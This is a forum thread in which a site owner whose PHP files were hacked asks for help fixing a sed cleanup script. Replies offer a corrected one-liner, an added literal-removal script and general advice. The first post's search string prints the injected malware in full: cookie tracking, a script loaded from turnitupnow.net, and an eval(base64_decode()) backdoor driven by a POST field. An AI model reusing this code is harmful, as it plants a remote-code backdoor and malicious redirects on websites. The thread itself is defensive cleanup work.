Could you help me get a script working?
Hi all,
I had my website hacked and thousands of files have a malicious script added inside PHP files. I have tried to remove the code using a script I located online but it fails. I think the problem is due to use of special characters in the string I am searching for. Here it is, if you could help me make it work I would be very grateful.

Code:
# *****************************************************************************************
# find_and_replace_in_files.sh
# This script does a recursive, case sensitive directory search and replace of files
# To make a case insensitive search replace, use the -i switch in the grep call
# uses a startdirectory parameter so that you can run it outside of specified directory - else this script will modify itself!
# *****************************************************************************************
#!/bin/bash
# **************** Change Variables Here ************
startdirectory="/path/to/public_html/"
searchterm="global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }"
replaceterm=""
# **********************************************************
echo "******************************************"
echo "* Search and Replace in Files Version .1 *"
echo "******************************************"
for file in $(grep -l -R $searchterm $startdirectory)
do
    sed -e "s/$searchterm/$replaceterm/ig" $file > /tmp/tempfile.tmp
    mv /tmp/tempfile.tmp $file
    echo "Modified: " $file
done
echo " *** Yay! All Done! *** "

Many thanks,
sean |
Hi, The problem was with an old piece of gallery software I no longer use. It has since been removed. The code is shown in my original post although that is not the only part of the attack. I had some tmp_xxxx.php files created and modifications to .htaccess. The problem has been plugged, I just need to clean my .php files now. Thanks, Seabro |
Code:
grep -l -R "$searchterm" "$startdirectory" 2>/dev/null | while IFS= read -r ITEM; do sed -i "s|$searchterm||ig" "${ITEM}"; done
|
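An added example, not code from any poster in this thread: the search string in the first post contains `$`, `[`, `/` and quotes, which sed reads as regex or delimiter syntax, so this sketch removes the string as literal text, using `grep -F` to find affected files and awk's `index()` to cut it out. It assumes the injected code sits on a single line and has been pasted verbatim into a "needle file"; that file and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: delete an injected string from PHP files as LITERAL text.
# Assumption: the injected code is on one line and was pasted verbatim into
# a "needle file" (hypothetical name), so no shell or regex quoting applies.

# strip_literal FILE NEEDLE_FILE
# Prints FILE with every literal occurrence of the needle removed.
strip_literal() {
    NEEDLE=$(cat "$2") awk '
        BEGIN { n = ENVIRON["NEEDLE"]; len = length(n) }
        {
            # index() is a plain substring search: $ [ ] . * / | stay literal
            while (len > 0 && (i = index($0, n)) > 0)
                $0 = substr($0, 1, i - 1) substr($0, i + len)
            print
        }' "$1"
}

# clean_tree DIR NEEDLE_FILE
# Cleans every *.php file under DIR that contains the needle, keeps the
# original as FILE.infected, and prints the path of each file it changed.
clean_tree() {
    find "$1" -type f -name '*.php' -exec grep -lF -f "$2" {} + |
    while IFS= read -r f; do
        cp -p "$f" "$f.infected" || continue
        # cat into the original so its owner and mode are preserved
        strip_literal "$f.infected" "$2" > "$f.tmp" && cat "$f.tmp" > "$f"
        rm -f "$f.tmp"
        echo "$f"
    done
}

# Run as: sh clean_literal.sh /path/to/public_html needle.txt
if [ "$#" -eq 2 ]; then
    clean_tree "$1" "$2"
fi
```

The `.infected` copies still hold the injected code, so move them out of the web root once the cleaned files have been checked.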
I just encountered Seabro's issue and managed to find this thread. Unspawn or Seabro, could you pls share the code that can wipe it off? Damn turnitupnow..
|
hey indyloft,
sorry to hear of your problem. It's been a while since this happened to me but I believe I ended up using 'sed'. Check it out, it can run through a load of files and modify the contents. I used it simply to remove the unwanted code. There is probably another way which is much better but 'sed' worked for me. Good luck. seabro |